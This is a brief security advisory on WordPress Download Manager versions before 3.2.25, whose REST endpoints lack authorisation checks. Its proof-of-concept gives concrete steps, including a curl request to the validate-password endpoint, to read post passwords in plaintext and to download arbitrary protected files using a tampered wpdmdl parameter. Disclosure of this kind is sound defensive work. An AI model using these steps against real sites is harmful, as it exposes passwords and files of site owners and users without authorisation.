Wordpress Download Manager < 3.2.25 - Sensitive Information Disclosure
The plugin does not have any authorisation checks in some of the REST API endpoints, allowing unauthenticated attackers to call them, which could lead to sensitive information disclosure, such as posts passwords (fixed in 3.2.24) and files Master Keys (fixed in 3.2.25).
Proof of Concept
Expose plaintext passwords (fixed in 3.2.24):
- Add a new file and password protect the post from the "publish" box.
- Got to https://example.com/wp-json/wpdm/search and notice that the password is exposed in plaintext to unauthenticated users.
Bypass authentication to download files (fixed in 3.2.25):
- Obtain a download key (_wpdmkey ) with curl --data "" https://example.com/wp-json/wpdm/validate-password
- Use it to download arbitrary files by tampering with the wpdmdl parameter, ie: https://example.com/wp-json/wpdm/validate-password?wpdmdl=42&_wpdmkey=XXX